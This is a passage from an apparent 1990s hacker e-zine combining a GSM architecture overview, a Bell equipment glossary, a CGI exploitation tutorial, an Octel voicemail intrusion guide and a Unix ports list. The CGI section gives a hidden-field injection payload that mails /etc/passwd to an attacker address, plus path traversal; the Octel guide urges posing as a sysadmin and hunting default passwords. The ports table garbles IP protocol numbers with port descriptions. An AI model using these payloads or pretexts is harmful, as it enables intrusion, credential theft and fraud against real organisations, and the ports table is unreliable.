  823. protocols with the Mobile Station.  In a large urban area, there will potentially be a large number of
  824. BTSs deployed.  The requirements for a BTS are ruggedness, reliability, portability, and minimum
  825. cost. 
  826.  
  827. The Base Station Controller manages the radio resources for one or more BTSs.  It handles
  828. radio-channel setup, frequency hopping, and handovers, as described below.  The BSC is the
  829. connection between the mobile and the Mobile service Switching Center (MSC).  The BSC also
  830. translates the 13 kbps voice channel used over the radio link to the standard 64 kbps channel used
  831. by the Public Switched Telephone Network or ISDN. 
  832.  
  833. 3.3  Network Subsystem 
  834.  
  835. The central component of the Network Subsystem is the Mobile services Switching Center (MSC). 
  836. It acts like a normal switching node of the PSTN or ISDN, and in addition provides all the
  837. functionality needed to handle a mobile subscriber, such as registration, authentication, location
  838. updating, handovers, and call routing to a roaming subscriber.  These services are provided in
  839. conjuction with several functional entities, which together form the Network Subsystem.  The MSC
  840. provides the connection to the public fixed network (PSTN or ISDN), and signalling between
  841. functional entities uses the ITU-T Signalling System Number 7 (SS7), used in ISDN and widely used
  842. in current public networks. 
  843.  
  844. The Home Location Register (HLR) and Visitor Location Register (VLR), together with the MSC,
  845. provide the call-routing and (possibly international) roaming capabilities of GSM.  The HLR contains
  846. all the administrative information of each subscriber registered in the corresponding GSM network,
  847. along with the current location of the mobile.  The current location of the mobile is in the form of a
  848. Mobile Station Roaming Number (MSRN) which is a regular ISDN number used to route a call to
  849. the MSC where the mobile is currently located.  There is logically one HLR per GSM network,
  850. although it may be implemented as a distributed database. 
  851.  
  852. The Visitor Location Register contains selected administrative information from the HLR, necessary
  853. for call control and provision of the subscribed services, for each mobile currently located in the
  854. geographical area controlled by the VLR.  Although each functional entity can be implemented as an
  855. independent unit, most manufacturers of switching equipment implement one VLR together with one
  856. MSC, so that the geographical area controlled by the MSC corresponds to that controlled by the
  857. VLR, simplifying the signalling required.  Note that the MSC contains no information about particular
  858. mobile stations - this information is stored in the location registers. 
  859.  
  860. The other two registers are used for authentication and security purposes.  The Equipment Identity
  861. Register (EIR) is a database that contains a list of all valid mobile equipment on the network, where
  862. each mobile station is identified by its International Mobile Equipment Identity (IMEI).  An IMEI is
  863. marked as invalid if it has been reported stolen or is not type approved.  The Authentication Center
  864. is a protected database that stores a copy of the secret key stored in each subscriber's SIM card,
  865. which is used for authentication and ciphering of the radio channel. 
  866.  
  867. 4  Radio link aspects 
  868.  
  869. References: [Che91, Bal91, Bal93, Rah93, Wat93] 
  870.  
  871. The International Telecommunication Union (ITU), which manages the international allocation of
  872. radio spectrum (among other functions) allocated the bands 890-915 MHz for the uplink (mobile
  873. station to base station) and 935-960 MHz for the downlink (base station to mobile station) for
  874. mobile networks in Europe.  Since this range was already being used in the early 1980s by the
  875. analog systems of the day, the CEPT had the foresight to reserve the top 10 MHz of each band for
  876. the GSM network that was still being developed.  Eventually, GSM will be allocated the entire 2x25
  877. MHz bandwidth. 
  878.  
  879. Since radio spectrum is a limited resource shared by all users, a method must be devised to divide up
  880. the bandwidth among as many users as possible.  The method chosen by GSM is a combination of
  881. Time- and Frequency-Division Multiple Access (TDMA/FDMA).  The FDMA part involves the
  882. division by frequency of the total 25 MHz bandwidth into 124 carrier frequencies of 200 kHz
  883. bandwidth.  One or more carrier frequencies are then assigned to each base station.  Each of these
  884. carrier frequencies is then divided in time, using a TDMA scheme, into eight time slots.  One time
  885. slot is used for transmission by the mobile and one for reception.  They are separated in time so that
  886. the mobile unit does not receive and transmit at the same time, a fact that simplifies the electronics. 
  887.  
  888. In the rest of this section, the procedure involved in digitally transmitting a voice signal in a GSM
  889. network is examined, along with some of the features, such as discontinuous transmission and
  890. reception, used to improve voice quality, reduce the mobile unit's power consumption, and increase
  891. the overall capacity of the network. 
  892.  
  893.       
  894.  
  895. 4.1  Channel structure 
  896.  
  897. The structure of the most common time-slot burst is shown in Figure 2.  A total of 156.25 bits is
  898. transmitted in 0.577 milliseconds, giving a gross bit rate of 270.833 kbps.  There are three other
  899. types of burst structure for frame and carrier synchronization and frequency correction.  The 26-bit
  900. training sequence is used for equalization, as described below.  The 8.25 bit guard time allows for
  901. some propagation time delay in the arrival of bursts.  
  902.  
  903. Each group of eight time slots is called a TDMA frame, which is transmitted every 4.615 ms. 
  904. TDMA frames are further grouped into multiframes to carry control signals.  There are two types of
  905. multiframe, containing 26 or 51 TDMA frames.  The 26-frame multiframe contains 24 Traffic
  906. Channels (TCH) and two Slow Associated Control Channels (SACCH) which supervise each call in
  907. progress.  The SACCH in frame 12 contains eight channels, one for each of the eight connections
  908. carried by the TCHs.  The SACCH in frame 25 is not currently used, but will carry eight additional
  909. SACCH channels when half-rate traffic is implemented.  A Fast Associated Control Channel
  910. (FACCH) works by stealing slots from a traffic channel to transmit power control and
  911. handover-signalling messages.  The channel stealing is done by setting one of the control bits in the
  912. time slot burst. 
  913.  
  914. In addition to the Associated Control Channels, there are several other control channels which
  915. (except for the Stand-alone Dedicated Control Channel) are implemented in time slot 0 of specified
  916. TDMA frames in a 51-frame multiframe, implemented on a non-hopping carrier frequency in each
  917. cell.  The control channels include: 
  918.  
  919.      Broadcast Control Channel (BCCH): Continually broadcasts, on the downlink, information
  920.      including base station identity, frequency allocations, and frequency-hopping sequences. 
  921.  
  922.      Stand-alone Dedicated Control Channel (SDCCH): Used for registration, authentication, call
  923.      setup, and location updating.  Implemented on a time slot, together with its SACCH, selected
  924.      by the system operator. 
  925.  
  926.      Common Control Channel (CCCH): Comprised of three control channels used during call
  927.      origination and call paging. 
  928.  
  929.           Random Access Channel (RACH): A slotted Aloha channel to request access to the
  930.           network 
  931.  
  932.           Paging Channel (PCH): Used to alert the mobile station of incoming call. 
  933.  
  934.           Access Grant Channel (AGCH): Used to allocate an SDCCH to a mobile for signalling,
  935.           following a request on the RACH. 
  936.  
  937. 4.2  Speech coding 
  938.  
  939. References: [NHdB89, V+89, S+89] 
  940.  
  941. GSM is a digital system, so speech signals, inherently analog, have to be digitized.  The method
  942. employed by ISDN, and by current telephone systems for multiplexing voice lines over high speed
  943. trunks and optical fiber lines, is Pulse Coded Modulation (PCM).  The output stream from PCM is
  944. 64 kbps, too high a rate to be feasible over a radio link.  The 64 kbps signal contains much
  945. redundancy, although it is simple to implement.  The GSM group studied several voice coding
  946. algorithms on the basis of subjective speech quality and complexity (which is related to cost,
  947. processing delay, and power consumption once implemented) before arriving at the choice of a
  948. Regular Pulse Excited - Linear Predictive Coder (RPE-LPC) with a Long Term Predictor loop. 
  949. Basically, information from previous samples, which does not change very quickly, is used to predict
  950. the current sample.  The coefficients of the linear combination of the previous samples, plus an
  951. encoded form of the residual, the difference between the predicted and actual sample, represent the
  952. signal.  Speech is divided into 20 millisecond samples, each of which is encoded as 260 bits, giving a
  953. total bit rate of 13 kbps. 
  954.  
  955. 4.3  Channel coding and modulation 
  956.  
  957. Due to natural or man-made electromagnetic interference, the encoded speech or data transmitted
  958. over the radio interface must be protected as much as is practical.  The GSM system uses
  959. convolutional encoding and block interleaving to achieve this protection.  The exact algorithms used
  960. differ for speech and for different data rates.  The method used for speech blocks will be described
  961. below. 
  962.  
  963. Recall that the speech codec produces a 260 bit block for every 20 ms speech sample.  From
  964. subjective testing, it was found that some bits of this block were more important for perceived speech
  965. quality than others.  The bits are thus divided into three classes: 
  966.  
  967. Class Ia  50 bits - most sensitive to bit errors
  968. Class Ib  132 bits - moderately sensitive to bit errors
  969. Class II  78 bits - least sensitive to bit errors 
  970.  
  971. Class Ia bits have a 3 bit Cyclic Redundancy Code added for error detection.  If an error is
  972. detected, the frame is judged too damaged to be comprehensible and it is discarded.  It is replaced
  973. by a slightly attenuated version of the previous correctly received frame.  These 53 bits, together
  974. with the 132 Class Ib bits and a 4 bit tail sequence (a total of 189 bits), are input into a 1/2 rate
  975. convolutional encoder of constraint length 4.  Each input bit is encoded as two output bits, based on
  976. a combination of the previous 4 input bits.  The convolutional encoder thus outputs 378 bits, to
  977. which are added the 78 remaining Class II bits, which are unprotected.  Thus every 20 ms speech
  978. sample is encoded as 456 bits, giving a bit rate of 22.8 kbps. 
  979.  
  980. To further protect against the burst errors common to the radio interface, each sample is diagonally
  981. interleaved.  The 456 bits output by the convolutional encoder are divided into 8 blocks of 57 bits,
  982. and these blocks are transmitted in eight consecutive time-slot bursts.  Since each time-slot burst can
  983. carry two 57 bit blocks, each burst carries traffic from two different speech samples. 
  984.  
  985. Recall that each time-slot burst is transmitted at a gross bit rate of 270.833 kbps.  This digital signal
  986. is modulated onto the analog carrier frequency, which has a bandwidth of 200 kHz, using
  987. Gaussian-filtered Minimum Shift Keying (GMSK).  GMSK was selected over other modulation
  988. schemes as a compromise between spectral efficiency, complexity of the transmitter, and limited
  989. spurious emissions.  The complexity of the transmitter is related to power consumption, which should
  990. be minimized for the mobile station.  The spurious radio emissions, outside of the allotted bandwidth,
  991. must be strictly controlled so as to limit adjacent channel interference, and allow for the co-existence
  992. of GSM and the older analog systems (at least for the time being). 
  993.  
  994. 4.4  Multipath equalization 
  995.  
  996. At the 900 MHz range, radio waves bounce off everything - buildings, hills, cars, airplanes, etc. 
  997. Thus many reflected signals, each with a different phase, can reach an antenna.  Equalization is used
  998. to extract the desired signal from the unwanted reflections. Equalization works by finding out how a
  999. known transmitted signal is modified by multipath fading, and constructing an inverse filter to extract
  1000. the rest of the desired signal.  This known signal is the 26-bit training sequence transmitted in the
  1001. middle of every time slot burst.  The actual implementation of the equalizer is not specified in the
  1002. GSM specifications.  
  1003.  
  1004. *Due To the Intense Length Of this Article It Has Been Broken Into 3 Parts Part 2 will Be 
  1005. Posted in NPA2*
  1006.  
  1007.  
  1008.  
  1009.  
  1010. :"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""":
  1011. :                         EQUIBELL-ALT P DICTIONARY                          :
  1012. :                                                                            :
  1013. :                                   by                                       :
  1014. :                           _  __   __    ____                               :
  1015. :                          | |/ /  /  \  | ___                               :
  1016. :                          |   /  | |  | |__  |                              :
  1017. :                          |   \  | |  |  __| |                              :
  1018. :                          |_|\_\  \__/  |____|                              :
  1019. """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
  1020. INTRODUCTION
  1021. ------------
  1022.         I always wished, and always will that I would have the pleasure to own
  1023. all the bell equipment.  And so I decided that I would make a checklist of all
  1024. the equipment that I knew of, well then the thought came to mind, I bet every-
  1025. one else would enjoy it do.  So here is a dictionary of all Bell equip that I
  1026. know of, if I missed something find me on dal.net in #npa, #phreaks, or where-
  1027. ever I am.
  1028.  
  1029.                                 DICTIONARY
  1030.                                 ----------
  1031.  
  1032. Bell 11mm, 3/8=  A single driver, an 11mm on one end and a 3/8 on the opposite
  1033.  
  1034. Bell Blue=  Scematic blue prints of a specific areas' wiring system
  1035.  
  1036. Bell Emitter=  A box that emits signals for the Bell Wireless Tester, it is a
  1037. tester, for the tester.
  1038.  
  1039. Bell Hard-Hat=  Ummm... let me think...
  1040.  
  1041. Bell Hex=  An allen wrench that has a hole drilled in the center.
  1042.  
  1043. Bell Lap=  A piece of crap with a 1200 kbps and shit mem.  Contains Bell 800
  1044. bbs #'s and other useless programs.
  1045.  
  1046. Bell Tester=  Uses light too represent voltages, 10-12, 0, 48, etc.. Has
  1047. modular and clips.
  1048.  
  1049. Bell Thing=  A large steel piece of equip which conects pieces of plastic
  1050. holding copper wires in the center (between the 2 plastic things)
  1051.                          ___________________________
  1052.                         |                           |
  1053.                         |***************************|
  1054.                         |___________________________|
  1055. (cont..) there by keeping the wires with there group & reducing "Jumbbled Up"
  1056. wiring.
  1057.  
  1058. Bell Wirerless Tester:  Uses tones to represent voltage.
  1059.  
  1060. DRACON:  A Bell linemans hand set with attached Beige.  Some dracons contain 4
  1061. extra buttons, rcl, snd, ect...  Name recived due to the fact that they are
  1062. made by the Harris Dracon Co.
  1063.  
  1064.                                    ___
  1065. FILE WROTE BY: Kosmos, for, |\  | |   \ |\  AMD FOR EVERYONE THAT WISHES TO
  1066.                             | \ | |___/ |_\  LEARN.
  1067.                             |  \| |     |  \
  1068.  
  1069. REMEMBER, if I left somthing out, no matter what it is, find me and tell me.
  1070.  
  1071.    
  1072.  
  1073. Advanced CGI Exploitation Techniques
  1074.                     By: IsolationX
  1075.  
  1076.                  
  1077.                     Common Gateway Interface (cgi) is a type of scripting language.  Cgi is not its "own" language, it is a combination of perl, C, and shell commands.  Cgi scripts are normaly stored in the /cgi-bin/ directory, this directory is exacutable via http.  When there is not a /cgi-bin/ directory it is normaly due to the admin changing the location of where the scripts are held or the server does not support cgi.  Cgi is commenly used for webpages but it can be used for many more types of things.  Since cgi is very commen it will, of course, produce major security flaws.  These flaws are normaly do to a amature scripter who knows very little about cgi and the security aspects of it.  Thus I have decided to write a indepth artical on cgi security and the ways to exploit it.  Lets begin.
  1078.  
  1079.  
  1080.                      Lets say you stumble onto Ms. Marry's webpage and it contains the following form...
  1081.  
  1082.         <form action = "www.site.com/cgi-bin/form1.pl" method="get">
  1083.         <input type="hidden" name="myaddress" value="marry@site.com">
  1084.         <input type = "text" name=input>
  1085.         <input type = "submit" value="Send comment">
  1086.         </form>
  1087.  
  1088.                      This is a simple form that asks the user to input a message, which is sent to a script called form1.pl.  Lets say that in the source of this script contains the following line (assume that the variables have already been parsed out of the input stream)....
  1089.  
  1090.         system("/usr/lib/sendmail -t $myaddress < $tempfile")
  1091.  
  1092.                  This puts what the user has entered into a temp file, then e-mails it to Ms. Marry.  Consider what you can do with this script.  Here is one way you could do exploit it http...
  1093.  
  1094. <form action = "www.site.com/cgi-bin/form1.pl" method="get">
  1095. <input type="hidden" name="myaddress" value=" ; mail -s passwd-file hacker@host.com < /etc/passwd;">
  1096. <input type = "text" name=input>
  1097. <input type = "submit" value="Get the passwd file">
  1098. </form>
  1099.                
  1100.                     I have just demenstrated a 'system call hole'.  The "system" call in perl, spawns a Unix shell and, in this case, exacutes the commands in the 'value' field, mailing the passwd file to hacker@host.com.  Just for refernece, the semicolons in the 'hidden value' field act as delimiters, which separate the commands.  
  1101.  
  1102.                      Any cgi system call is inherently exploitable if not correctly coded (which it rearely is).  Consider the following line of code within a cgi script...
  1103.  
  1104.         print `/usr/local/bin/finger $userinput`;
  1105.  
  1106.                      This could be taken advantage of by using the same type of maliciuos input as before.  In genral if any of the following characters are included in a system call it is most likely exploitable in some means.
  1107.  
  1108.         ; > < & * ` | $ #
  1109.  
  1110.                      Anyway, enough on system calls, lets move on.
  1111.  
  1112.  
  1113.  
  1114.                     Opening a file on a system remotely is always a plus for the hacker, so let me show you a quick example of how to get read access to a most any file on a system by exploiting a small script.  Say that you are writing a script that stores a message based on the username of the user entering it, and you add the following line to your script...
  1115.  
  1116.         open(FILE,"> /usr/local/message/data/$username");
  1117.  
  1118.                      Well what if the user was to type in ../../../../etc/passwd as his username?  You would, ofcourse, get read access to /etc/passwd.  Simple enough but very affective, need I say more...?
  1119.  
  1120.  
  1121.                      A good trick to know off hand is to subvert the systems variables to point to a trojan horse in another directory.  Here is a quick and pretty straight forward line of code that is volnurable to this type of atack...
  1122.  
  1123.         system("finger $untained_user");
  1124.  
  1125.  
  1126.  
  1127.                      Now I have been talking about the code for the cgi scripts and you are probaly thinking well how the hell am I going to get the code for custom scripts in the first placeLets say that Mr. Johnson just wrote a cgi script in EMACS or a simamler type of editor.  Well when you write cgi scipt in one of those types of editors it automaticaly creates a backup of the file with the extention of ~.   Now that you know this (I hope you did know this before now) you can sometimes stuble apon the source of custom cgi scripts and check them for voulnerbilitys.
  1128.  
  1129.                      Before I go let me say, allways watch for scripts that query a file on the remote system... It can be used to view files on that system (e.x. /etx/passwd or /etc/shadow).  A example of this is the infamouse 'phf' bug.  Anyway Keep it together.
  1130.  
  1131.  
  1132.                 Be Cool,
  1133.                      IsolationX
  1134.  
  1135.              
  1136.              
  1137.   D.           Operating Guide For Octel Voice Mail Systems
  1138.                --------------------------------------------
  1139.  
  1140.                           Written By: De-Format
  1141.         
  1142.         Ok... lots of companys use Octel as thier voice mail OS... and it's
  1143. pretty basic to operate.  But there's some things within Octel that aren't
  1144. well known of.  This file was written mainly for people who are just 
  1145. experimenting in the voice mail field, or who wish to persue into it, and are
  1146. just starting.  However, some "veteran" VMB hackers may wish to read this 
  1147. also, it's all you really need to know about Octel.
  1148.  
  1149. Table Of Contents
  1150. -----------------
  1151. 1) How you know you have an Octel VMB system.
  1152. 2) The complete list of Octel commands.
  1153. 3) Further explanation of selected Octel options.
  1154. 4) General tips.
  1155. 5) How you can reach Octel.
  1156.  
  1157.  
  1158. 1) How you know you have an Octel VMB system.
  1159. ---------------------------------------------
  1160.  
  1161. Most companys only put up there 1-800 VMB system after work hours, but 
  1162. sometimes you'll get lucky and come across an automated system thats up 24
  1163. hours a day.  So you call the 1-800 number, once you hear the greeting, press
  1164. the # key.  If you get some bitchy voice saying "Please Enter Your Mailbox 
  1165. Number", then you've probably got an Octel.  (You'll recognize the voice from
  1166. other places)  Now it's all upto you.  There's a million and one ways you
  1167. can get someone's mailbox number and sometimes even their password.  Phone up
  1168. during business hours and get connected to some company worker, tell them your
  1169. the sysadmin and tell them the voice mail system had some sort of crash, or
  1170. start asking them question about the company and tell them you want to leave
  1171. them a message.  (Get their box and your all set, you just have to hope they
  1172. have a default pw, or you can scan a bunch of nums until you find some un-used
  1173. boxes).
  1174.  
  1175. 2) The complete list of Octel commands.
  1176. ---------------------------------------
  1177.  
  1178. ==============================================================================
  1179. Phone the 1-800 number.
  1180. Get the intro prompt.                        
  1181. Press #.
  1182. Enter mailbox number.
  1183. Enter password.
  1184. ==============================================================================
  1185. Check unheard messages press 11.
  1186. Review saved messages press 1.
  1187. Send a message press 2.
  1188. Check receipt press 3.
  1189. Personal options press 4.
  1190. Restart press 5.
  1191. Exit press *.
  1192. ==============================================================================
  1193. If you pressed 1 you go on to these options while listening to the message(s).
  1194. Position: Rewind-1, Pause/Restart-2, Fast Forward-3.
  1195. Speed: Slower-4, Envelope-5, Faster-6.
  1196. Volume: Normal-8, Louder-9.
  1197. To cancel press *.
  1198. For help press 0.
  1199. To skip press #.
  1200. ==============================================================================
  1201. After the message you have these options.
  1202. To replay press 4.
  1203. For the envelope press 5.
  1204. To forward a copy to another destination press 6.
  1205. To erase the message press 7.
  1206. To reply to the message, press 8.
  1207. To save the message, press 9.
  1208. To return to the main menu press *.
  1209. ==============================================================================
  1210. If you pressed 2 you go onto these options after you recorded your message.
  1211. To reply the message, press 1.
  1212. If you are finished recording, press #.
  1213. Enter the destination of the message, or spell a name by pressing #.
  1214. ==============================================================================
  1215. Once your destination is entered, you have these extra options.
  1216. To mark the message private press 1.
  1217. To mark the message urgent press 2.
  1218. For message recieved confirmation, press 3.
  1219. Future delivery press 4.
  1220. ==============================================================================
  1221. Even more options after the ones directly above include.
  1222. To send, press #.
  1223. No more destinations, press *.
  1224. To confirm receipt, press 1.
  1225. To notify of non-receipt, press 2.
  1226. ==============================================================================
  1227. If you press 3 you go onto this option.
  1228. Enter mailbox number or press # to spell the name.
  1229. ==============================================================================
  1230. If you press 4 you get these personal options.
  1231. To turn notification ON/OFF press 1.
  1232. For administrative options, press 2.
  1233. For greetings press 3.
  1234. Notification schedule, press 4.
  1235. Mailbox forwarding, press 5.
  1236. Security options press 6.
  1237. ==============================================================================
  1238. If you pressed 2 at the personal options menu, you will be at the admin menu.
  1239. Passwords press 1.
  1240. Group lists press 2.
  1241. Prompt levels press 3.
  1242. Date & time playback, press 4.
  1243. ==============================================================================
  1244. If you press 1 at the admin options, these are your options.
  1245. Guest 1 (mailbox 91) press 1.
  1246. Guest 2 (mailbox 92) press 2.
  1247. Home (mailbox 93) press 3.
  1248. Secretary press 4.
  1249. Personal press 5.
  1250. ==============================================================================
  1251. If you press 2 at the admin options, these are your options.
  1252. Create a group list, press 1.
  1253. Edit a group list, press 2.
  1254. Delete a group list, press 3.
  1255. List names, press 4.
  1256. ==============================================================================
  1257. If you press 3 at the admin options, these are your options.
  1258. Standard prompt levels, press 1.
  1259. Extended prompt levels, press 2.
  1260. Rapid prompt levels, press 3.
  1261. ==============================================================================
  1262. If you press 3 at the personal options menu, these are your options.
  1263. Personal greeting, press 1.
  1264. Exteneded absence, press 2
  1265. Name, press 3.
  1266. ==============================================================================
  1267. If you press 4 at the personal options menu, these are your options.
  1268. 1st schedule notification, press 1.
  1269. 2nd schedule notification, press 2.
  1270. Temporary notification, press 3.
  1271. ==============================================================================
  1272. If you press 5 at the personal options menu, these are your options.
  1273. To establish or change forwarding destination, press 1.
  1274. To cancel forwarding destination, press 2.
  1275. ==============================================================================
  1276. If you press 6 at the personal options menu, these are your options.
  1277. To turn on access security press 1.
  1278. To turn off access security press 2.
  1279. To hear the tutorial press 0.
  1280. ==============================================================================
  1281.  
  1282. 3) Further explanation of selected Octel commands.
  1283. --------------------------------------------------
  1284.  
  1285. Envelope Information: When your listening to a message, or after it ends, you
  1286. can obtain envelope info.  If the message sender is a subscriber, you can
  1287. hear the sender's name.  (If the person is not on the Octel system you'll be
  1288. told the message was left by an outside caller.)  You'll also be told of the
  1289. time and date the message was sent at, how long it is and whether it's urgent
  1290. and/or private.  If your listening to an archived (saved) message, the time
  1291. refers to when the message was archived, or sent... it all depends on how the
  1292. system is set up.  If you get envelope info during the message, the message
  1293. will continue where you left off when the envelope info is done.
  1294. ==============================================================================
  1295. Passwords: Your password can be up to 15 digits long.  The sysadmin (whose
  1296. account you may be able to acquire) decides on the minimal digits for a 
  1297. password.  Passwords must be different on all your boxes.  (Example... if your
  1298. password was 5555 then your password on one of your guest boxes can't be 5555)
  1299. If you want to find out the current password being used on a box, press 0
  1300. immediately after you identify the type of password to be changed.
  1301. You can have two guest passwords, and therefore two guest mailboxes, as you
  1302. already knew.  You can give a guest mailbox to someone who doesn't have a 
  1303. legit box but you keep in touch with a lot.  (You also have control over the
  1304. guest box so, well, if at some time you want to break the lines of 
  1305. communication that the person of the guest mailbox uses, you can)  Guests can
  1306. only hear messages that you send them.  Thats not fair is it?  If you change
  1307. the password on a guest mailbox, all messages still in the box are erased.
  1308. Not even the system administrator can get your password.  If you forgot it,
  1309. then your pretyt much screwed cause you have to have your mailbox reset and
  1310. well, if you go asking he's going to wonder where in the world you came from.
  1311. If you give someone a guest password they must call the system telephone 
  1312. number, press #, enter your mailbox number and enter the password that allows
  1313. entry into his/her portion of your mailbox.
  1314. ==============================================================================
  1315. Group Distribution Lists: Group lists are ok to have if you "obtain" a large
  1316. number of boxes on the system and decide to be nice and give them to friends,
  1317. otherwise this option is just plain useless.
  1318. ==============================================================================
  1319. Notification Schedule: The notification schedule is kinda cool.  You can have
  1320. the system call you at any specified time frame once you recieve messages.  
  1321. You can even set up different time schedules for different portions of the 
  1322. week/night/day.  Depending on where you live, the system may/may not be able 
  1323. to call you, it's whatever the sysadmin set it at, but if you can get his/her
  1324. account, then your set.
  1325. ==============================================================================
  1326. Access Security: This option is nice to have, but if you have the IQ of a 
  1327. watermelon you won't need it.  This option is somewhat a pain in the ass also.
  1328. You have to record your name and time of day.  Next time you logon it will
  1329. tell you who was last on.  (If the name isn't your's then you might want to
  1330. sit down and think long and hard about the positive aspects of watermelons).
  1331. If you hear silence for the name and time, or the following prompt: "The last
  1332. mailbox access was by recorded name and time skipped." then you just might
  1333. want to change your password to something a watermelon couldn't guess, because
  1334. if you do hear that then chances are someone was in on your account.
  1335. ==============================================================================
  1336.  
  1337. 4) General tips.
  1338. ----------------
  1339.  
  1340. - If your placing a call to the system with a AT&T calling card/calling card
  1341.   number, then be sure not to hit # too quickly.  This may indicate to AT&T 
  1342.   that you want to place another calling card call.  Wait until the system's
  1343.   intro prompt is done.  You can also press * to enter the system as a 
  1344.   subscriber.
  1345. - Thats about the only tip there is... everything else should be fine.
  1346.  
  1347. 5) How you can reach Octel.
  1348. ---------------------------
  1349.  
  1350. On the phone: 1-800-87-OCTEL  
  1351. Snail Mail: Octel Communications Corporation
  1352.             1001 Murphy Ranch Road
  1353.             Milpitas, California USA 95035-7912
  1354. On the web: www.octel.com
  1355.  
  1356.  
  1357. E.
  1358. My unix port hand book
  1359. Unix Ports
  1360.           by (\/)@ster Y0d@
  1361.  
  1362.  
  1363. Decimal    Keyword     Protocol                              
  1364. -------    -------     --------                         
  1365.   
  1366.      0                 Reserved                              
  1367.      1     ICMP        Internet Control Message       
  1368.      2     IGMP        Internet Group Management     
  1369.      3     GGP         Gateway-to-Gateway              
  1370.      4     IP          IP in IP (encasulation)               
  1371.      5     ST          Stream                 
  1372.      6     TCP         Transmission Control           
  1373.      7     UCL         UCL                                    
  1374.      8     EGP         Exterior Gateway Protocol     
  1375.      9     IGP         any private interior gateway          
  1376.     10     BBN-RCC-MON BBN RCC Monitoring                    
  1377.     11     NVP-II      Gives you info on all the users in the system
  1378.     12     PUP         PUP                             
  1379.     13     ARGUS       Daytime and date a location            
  1380.     14     EMCON       EMCON                                 
  1381.     15     XNET        Cross Net Debugger            
  1382.     16     CHAOS       Chaos                                 
  1383.     17     UDP         User Datagram                  
  1384.     18     MUX         Multiplexing                  
  1385.     19     DCN-MEAS    DCN Measurement Subsystems           
  1386.     20     HMP         Host Monitoring                
  1387.     21     PRM         Transfer files        
  1388.     22     XNS-IDP     XEROX NS IDP              
  1389.     23     TRUNK-1     Telnet login      
  1390.     24     TRUNK-2     Trunk-2                              
  1391.     25     LEAF-1      Send mail port
  1392.     26     LEAF-2      Leaf-2                               
  1393.     27     RDP         Reliable Data Protocol         
  1394.     28     IRTP        Internet Reliable Transaction  
  1395.     29     ISO-TP4     ISO Transport Protocol Class 4 
  1396.     30     NETBLT      Bulk Data Transfer Protocol    
  1397.     31     MFE-NSP     MFE Network Services Protocol  
  1398.     32     MERIT-INP   MERIT Internodal Protocol             
  1399.     33     SEP         Sequential Exchange Protocol        
  1400.     34     3PC         Third Party Connect Protocol         
  1401.     35     IDPR        Inter-Domain Policy Routing Protocol 
  1402.     36     XTP         XTP                                   
  1403.     37     DDP         Datagram Delivery Protocol,Time! 
  1404.     38     IDPR-CMTP   IDPR Control Message Transport Proto 
  1405.     39     TP++        TP++ Transport Protocol ,Resouce Location too 
  1406.     40     IL          IL Transport Protocol                
  1407.     41     SIP         Simple Internet Protocol              
  1408.     42     SDRP        Source Demand Routing Protocol      
  1409.     43     SIP-SR      Info on hosts and networks  
  1410.     44     SIP-FRAG    SIP Fragment                         
  1411.     45     IDRP        Inter-Domain Routing Protocol   
  1412.     46     RSVP        Reservation Protocol           
  1413.     47     GRE         General Routing Encapsulation     
  1414.     48     MHRP        Mobile Host Routing Protocol
  1415.     49     BNA         BNA                          
  1416.     50     SIPP-ESP    SIPP Encap Security Payload 
  1417.     51     SIPP-AH     SIPP Authentication Header  
  1418.     52     I-NLSP      Integrated Net Layer Security  
  1419.     53     SWIPE       IP with Encryption , Also Name Server 
  1420.     54     NHRP        NBMA Next Hop Resolution Protocol
  1421.  55-60                 Unassigned                            
  1422.     61                 any host internal protocol            
  1423.     62     CFTP        CFTP                            
  1424.     63                 any local network                     
  1425.     64     SAT-EXPAK   SATNET and Backroom EXPAK            
  1426.     65     KRYPTOLAN   Kryptolan                            
  1427.     66     RVD         MIT Remote Virtual Disk Protocol      
  1428.     67     IPPC        Internet Pluribus Packet Core        
  1429.     68                 any distributed file system          
  1430.     69     SAT-MON     SATNET Monitoring                     
  1431.     70     GOPHER      VISA Protocol ,Out of Date info hunter    
  1432.     71     IPCV        Internet Packet Core Utility          
  1433.     72     CPNX        Computer Protocol Network Executive 
  1434.     73     CPHB        Computer Protocol Heart Beat        
  1435.     74     WSN         Wang Span Network                     
  1436.     75     PVP         Packet Video Protocol                 
  1437.     76     BR-SAT-MON  Backroom SATNET Monitoring           
  1438.     77     SUN-ND      SUN ND PROTOCOL-Temporary             
  1439.     78     WB-MON      WIDEBAND Monitoring                   
  1440.     79     WB-EXPAK    WIDEBAND EXPAK, lots of info on users  
  1441.     80     ISO-IP      ISO Internet Protocol, web server  
  1442.     81     VMTP        VMTP                                
  1443.     82     SECURE-VMTP SECURE-VMTP                          
  1444.     83     VINES       VINES                                 
  1445.     84     TTP         TTP                                   
  1446.     85     NSFNET-IGP  NSFNET-IGP                           
  1447.     86     DGP         Dissimilar Gateway Protocol     
  1448.     87     TCF         TCF                                  
  1449.     88     IGRP        IGRP                            
  1450.     89     OSPFIGP     OSPFIGP                     
  1451.     90     Sprite-RPC  Sprite RPC Protocol           
  1452.     91     LARP        Locus Address Resolution Protocol    
  1453.     92     MTP         Multicast Transport Protocol          
  1454.     93     AX.25       AX.25 Frames                         
  1455.     94     IPIP        IP-within-IP Encapsulation Protocol   
  1456.     95     MICP        Mobile Internetworking Control Pro.   
  1457.     96     SCC-SP      Semaphore Communications Sec. Pro.    
  1458.     97     ETHERIP     Ethernet-within-IP Encapsulation     
  1459.     98     ENCAP       Encapsulation Header         
  1460.     99                 any private encryption scheme        
  1461.    100     GMTP        GMTP                                
  1462.    110     POP         Incoming E-mail
  1463.    111-254                Unassigned                           
  1464.     255                Reserved                            
  1465.     443    SHTP        Another web server
  1466.     512    BIFF        Mail Notification
  1467.     513    RLOGIN      Remote login
  1468.     520    ROUTE       Routing information protocol
  1469.  
  1470.  
  1471. The port information is this file is derived from the RFC standards.
  1472. If you liked this file send your comments to mastyoda@concentric.net
  1473. if you hated this and though it was stupid send it to my dev/null. 
  1474. The info in the text is very useful to any hacker, elite of not,
  1475. everyone needs to port surf. Port Surfers will lover me for doing this.
  1476. (\/)@ster Y0d@
  1477.  
  1478.  
  1479. F.
  1480.  
  1481.  
  1482. ------[  Using a Guest Lynx Account to Your Advantage]----------------
  1483.  
  1484.  
  1485. ******************* by Electric Nectar*****************
  1486.  
  1487.                               
  1488.  
  1489. ----------
  1490. Situation:
  1491. ----------
  1492.  
  1493.     Ok so you're trying to get a valid account on a server for whatever
